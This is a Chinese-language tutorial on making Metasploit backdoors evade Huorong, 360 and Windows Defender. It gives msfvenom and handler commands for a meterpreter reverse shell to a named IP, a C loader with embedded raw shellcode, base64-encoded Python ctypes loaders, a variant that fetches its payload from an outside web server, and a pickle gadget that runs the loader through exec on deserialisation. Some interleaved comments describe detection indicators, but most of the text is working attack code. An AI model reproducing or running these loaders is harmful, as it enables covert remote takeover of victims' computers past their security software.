免杀对抗-免杀Ctypes-绕过Shellcode&火绒&360&Defender

免杀对抗-免杀Ctypes-绕过Shellcode&火绒&360&Defender

python语言中的ctypes模块是一个外部函数接口(FFI)模块,用于调用C库中的函数,因此常被用来做免杀应用

一.加载器选择-ctypes-DLL引用&执行C代码

一般,我们生成的后门在实战中,上传上去都会被该肉鸡的杀毒软件给杀掉,所以免杀成为了我们必须掌握的知识之一。

我们可以通过生成DLL文件,然后用python的ctypes模块去执行该DLL文件中的后门,就可以相对绕过一些杀毒软件。说到这里有些朋友肯定会问,在实战中,不是每个服务器都有python环境呀?这时我们当然就是将python代码编译成exe文件再上传执行(可以用pyinstaller或py2exe)

pyinstaller.exe -F -w 对应的py文件(其中调用了该dll)
应用DLL载入执行:(载入DLL进行DLL代码函数调用执行)

C++:

// DLL export consumed by the Python ctypes snippet below.
// extern "C" keeps the symbol name un-mangled so CDLL('dll2').TestCtypes resolves it;
// _declspec(dllexport) (MSVC spelling of __declspec) puts it in the export table.
// printf() requires <stdio.h>/<cstdio>, which this excerpt does not show.
extern "C" _declspec(dllexport) void TestCtypes() {

​    printf("I like eating watermelon\n");

}



Python:

from ctypes import *



# Load dll2.dll through the normal Windows DLL search path.
# ctypes.CDLL itself is a benign FFI call; what an AV/EDR would examine here is the
# dropped, unsigned DLL being loaded into python.exe, not this line.

lib=CDLL('dll2')

# Call the exported TestCtypes() from that library (the C++ export shown above).

lib.TestCtypes()

打包器选择-C语言编译-MSF-C-电脑管家

1、管家各种过-火绒 defender查杀
msfvenom -p windows/meterpreter/reverse_tcp lhost=47.94.236.117 lport=6688 -f c
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 6688
run
VS创建项目,添加C语言文件,添加执行代码并替换Shellcode,编译生成
#include <Windows.h>
#include <stdio.h>
#include <string.h>

#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") // GUI subsystem so no console window appears, while keeping the console CRT entry so main() still runs

/* Raw stage-0 stub emitted by the msfvenom command above (-f c), embedded as an
 * initialized global array.  Because it is stored unencoded, the exact byte
 * sequence is present verbatim in the compiled binary, which is what static
 * signature scanners match on.  Note that sizeof(buf) counts the string
 * literal's terminating NUL as well. */
unsigned char buf[] =
"\xfc\xe8\x8f\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\x49"
"\x75\xef\x52\x8b\x52\x10\x57\x8b\x42\x3c\x01\xd0\x8b\x40\x78"
"\x85\xc0\x74\x4c\x01\xd0\x8b\x48\x18\x50\x8b\x58\x20\x01\xd3"
"\x85\xc9\x74\x3c\x31\xff\x49\x8b\x34\x8b\x01\xd6\x31\xc0\xc1"
"\xcf\x0d\xac\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24"
"\x75\xe0\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c"
"\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59"
"\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xe9\x80\xff\xff\xff\x5d"
"\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26"
"\x07\x89\xe8\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68"
"\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x68\x2f\x5e\xec\x75\x68\x02"
"\x00\x1a\x20\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea"
"\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5\x74\x61"
"\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x67\x00\x00"
"\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83"
"\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a"
"\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57"
"\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x68\x00"
"\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5\x57\x68"
"\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\x0f\x85\x70\xff"
"\xff\xff\xe9\x9b\xff\xff\xff\x01\xc3\x29\xc6\x75\xc1\xc3\xbb"
"\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5";

/* Self-injection loader: allocate RWX memory, copy buf into it, jump to it.
 * `main()` with no return type is pre-C99 implicit int (accepted by the MSVC C
 * compiler, not valid C++).  From a detection standpoint this is the canonical
 * in-process shellcode sequence — a PAGE_EXECUTE_READWRITE private commit
 * followed by execution from non-image memory — which memory scanners and EDR
 * hooks on VirtualAlloc treat as a high-confidence indicator regardless of how
 * the bytes in buf are encoded. */
main()

{
    char* Memory;

    /* Commit + reserve one RWX region of sizeof(buf) bytes. */
    Memory = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

    /* The VirtualAlloc result is never checked; a NULL return is dereferenced here. */
    memcpy(Memory, buf, sizeof(buf));

    /* Reinterpret the buffer as a void() function and transfer control into it. */
    ((void(*)())Memory)();

}

加密器选择-Python编译-MSF-C-bs64-Defender

利用思路:生成时先对Payload进行编码,Python运行时再解码并调用执行,以此绕过静态查杀。
pyinstaller打包-defender
msfvenom -p windows/meterpreter/reverse_tcp --encrypt base64 lhost=ip lport=port -f c
Pycharm调用Ctypes模块解码调用C
pyinstaller.exe -F -w ms-py.py

import ctypes
import base64

# Base64 text of the msfvenom output (the --encrypt base64 option above), written as
# \xNN escapes so the literal's own bytes do not resemble the stub.  The newlines
# inside the triple-quoted string are not base64 alphabet characters, and
# base64.b64decode() discards them by default (validate=False).
encode_shellcode = '''\x2f\x4f\x69\x50\x41\x41\x41\x41\x59\x44\x48\x53\x5a\x49\x74
\x53\x4d\x49\x74\x53\x44\x49\x74\x53\x46\x49\x6e\x6c\x69\x33
\x49\x6f\x44\x37\x64\x4b\x4a\x6a\x48\x2f\x4d\x63\x43\x73\x50
\x47\x46\x38\x41\x69\x77\x67\x77\x63\x38\x4e\x41\x63\x64\x4a
\x64\x65\x39\x53\x56\x34\x74\x53\x45\x49\x74\x43\x50\x41\x48
\x51\x69\x30\x42\x34\x68\x63\x42\x30\x54\x41\x48\x51\x69\x31
\x67\x67\x41\x64\x4f\x4c\x53\x42\x68\x51\x68\x63\x6c\x30\x50
\x45\x6d\x4c\x4e\x49\x73\x42\x31\x6a\x48\x2f\x4d\x63\x43\x73
\x77\x63\x38\x4e\x41\x63\x63\x34\x34\x48\x58\x30\x41\x33\x33
\x34\x4f\x33\x30\x6b\x64\x65\x42\x59\x69\x31\x67\x6b\x41\x64
\x4e\x6d\x69\x77\x78\x4c\x69\x31\x67\x63\x41\x64\x4f\x4c\x42
\x49\x73\x42\x30\x49\x6c\x45\x4a\x43\x52\x62\x57\x32\x46\x5a
\x57\x6c\x48\x2f\x34\x46\x68\x66\x57\x6f\x73\x53\x36\x59\x44
\x2f\x2f\x2f\x39\x64\x61\x44\x4d\x79\x41\x41\x42\x6f\x64\x33
\x4d\x79\x58\x31\x52\x6f\x54\x48\x63\x6d\x42\x34\x6e\x6f\x2f
\x39\x43\x34\x6b\x41\x45\x41\x41\x43\x6e\x45\x56\x46\x42\x6f
\x4b\x59\x42\x72\x41\x50\x2f\x56\x61\x67\x70\x6f\x4c\x31\x37
\x73\x64\x57\x67\x43\x41\x42\x6f\x67\x69\x65\x5a\x51\x55\x46
\x42\x51\x51\x46\x42\x41\x55\x47\x6a\x71\x44\x39\x2f\x67\x2f
\x39\x57\x58\x61\x68\x42\x57\x56\x32\x69\x5a\x70\x58\x52\x68
\x2f\x39\x57\x46\x77\x48\x51\x4b\x2f\x30\x34\x49\x64\x65\x7a
\x6f\x5a\x77\x41\x41\x41\x47\x6f\x41\x61\x67\x52\x57\x56\x32
\x67\x43\x32\x63\x68\x66\x2f\x39\x57\x44\x2b\x41\x42\x2b\x4e
\x6f\x73\x32\x61\x6b\x42\x6f\x41\x42\x41\x41\x41\x46\x5a\x71
\x41\x47\x68\x59\x70\x46\x50\x6c\x2f\x39\x57\x54\x55\x32\x6f
\x41\x56\x6c\x4e\x58\x61\x41\x4c\x5a\x79\x46\x2f\x2f\x31\x59
\x50\x34\x41\x48\x30\x6f\x57\x47\x67\x41\x51\x41\x41\x41\x61
\x67\x42\x51\x61\x41\x73\x76\x44\x7a\x44\x2f\x31\x56\x64\x6f
\x64\x57\x35\x4e\x59\x66\x2f\x56\x58\x6c\x37\x2f\x44\x43\x51
\x50\x68\x58\x44\x2f\x2f\x2f\x2f\x70\x6d\x2f\x2f\x2f\x2f\x77
\x48\x44\x4b\x63\x5a\x31\x77\x63\x4f\x37\x38\x4c\x57\x69\x56
\x6d\x6f\x41\x55\x2f\x2f\x56
'''

# Decode back to the raw stub bytes; the encoding only hides them from byte
# signatures on disk, the decoded buffer is plain in memory from here on.
shellcode = base64.b64decode(encode_shellcode)
#print(shellcode)

# Self-injection through kernel32: 0x1000 == MEM_COMMIT, 0x40 == PAGE_EXECUTE_READWRITE.
# The VirtualAlloc(RWX) -> RtlMoveMemory -> CreateThread chain from python.exe is the
# behavioural pattern EDR API hooks look for, independent of the base64 wrapping.
rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)
# Copy the decoded bytes into the RWX page (create_string_buffer adds a trailing NUL
# that is not copied because the length argument is len(shellcode)).
ctypes.windll.kernel32.RtlMoveMemory(rwxpage, ctypes.create_string_buffer(shellcode), len(shellcode))
# New thread whose start address is the RWX page; no parameter, default flags.
handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0)
# -1 is passed as INFINITE: block the interpreter until that thread ends.
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)

加密器选择-Python编译-MSF-C-无Payload-火绒

利用思路:将Payload存放在互联网资源上,运行时通过HTTP请求获取后再解码执行;若仍被查杀,则通过定位特征码的方式找到被查杀的关键代码块,对其继续编码以绕过。
pyinstaller打包-defender
msfvenom -p windows/meterpreter/reverse_tcp --encrypt base64 lhost=ip lport=port -f c
Pycharm调用Ctypes模块解码调用C
pyinstaller.exe -F -w ms-py-2.py

import ctypes
import requests
import base64

# The base64 text is pulled from a web server at run time, so the packaged exe
# carries no payload bytes at all (the "no Payload" variant).  The observable
# moves to the network: a cleartext HTTP GET to this URL from the process, which
# proxy/DNS logs and egress filtering see even when the file itself looks clean.
encode_shellcode = requests.get("http://www.xiaodi8.com/123.txt").text
shellcode = base64.b64decode(encode_shellcode)
#print(shellcode)

# 0x1000 == MEM_COMMIT, 0x40 == PAGE_EXECUTE_READWRITE (same RWX allocation as before).
rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)
# `func` decodes to the same RtlMoveMemory(rwxpage, create_string_buffer(shellcode),
# len(shellcode)) line as the previous listing; only its source text is hidden so the
# API name is not a plain string in the file.  exec() of base64-decoded source is
# itself a strong static indicator, and the API call is unchanged at run time.
func=base64.b64decode(b'Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTWVtb3J5KHJ3eHBhZ2UsIGN0eXBlcy5jcmVhdGVfc3RyaW5nX2J1ZmZlcihzaGVsbGNvZGUpLCBsZW4oc2hlbGxjb2RlKSk=')
exec(func)
handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)

反序列化-Python免杀

先将执行上线的python代码进行序列化操作:
import pickle
import base64

# Source text of the ctypes loader from the previous section, kept as a string.
# (The base64 payload literal has been stripped from this copy of the page.)
# Nothing here is executed by this script; the text is only embedded in the
# pickle as the argument that __reduce__ hands to exec.
shellcode = '''
import ctypes,base64
encode_shellcode=b'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'
shellcode = base64.b64decode(encode_shellcode)
rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)
ctypes.windll.kernel32.RtlMoveMemory(rwxpage, ctypes.create_string_buffer(shellcode), len(shellcode))
handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)'''


class A(object):
    """Pickle gadget: pickling an instance records ``(exec, (shellcode,))``.

    ``pickle`` serialises an object by storing whatever ``__reduce__`` returns —
    here a reference to ``builtins.exec`` plus the source string — and rebuilds
    it on load by *calling* that callable.  This is the textbook reason
    ``pickle.loads`` must never see untrusted data; a restricted ``Unpickler``
    whose ``find_class`` allow-lists safe globals refuses the ``exec`` reference,
    and content scanners key on ``builtins``/``exec`` references inside pickle data.
    """
    def __reduce__(self):
        return (exec, (shellcode,))  # exec: run the code held in the shellcode string when unpickled


ret = pickle.dumps(A())  # serialise the gadget; the stream holds the exec reference and source, it does not run them here
ret_base64 = base64.b64encode(ret)
print(ret_base64)  # the printed blob is what the loader below embeds



然后在目标上将序列化并编码后的数据解码、反序列化,即会自动调用执行,可做到一定的免杀效果:
import base64,pickle,ctypes
shellcode=b'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'  ## base64 of the pickle printed by the generator above
# pickle.loads() rebuilds the object by calling the callable recorded by __reduce__ — exec —
# so merely deserialising this blob runs the embedded loader.  Mitigation on the consuming
# side is to never unpickle untrusted bytes, or to subclass pickle.Unpickler and override
# find_class to reject builtins.exec; on the scanning side, base64(pickle) containing an
# exec/eval/os.system reference is the indicator.
pickle.loads(base64.b64decode(shellcode))

《免杀对抗-免杀Ctypes-饶过Shellcode&火绒&360&Defender》 Shmily 采用 知识共享署名 4.0 国际许可协议 进行许可。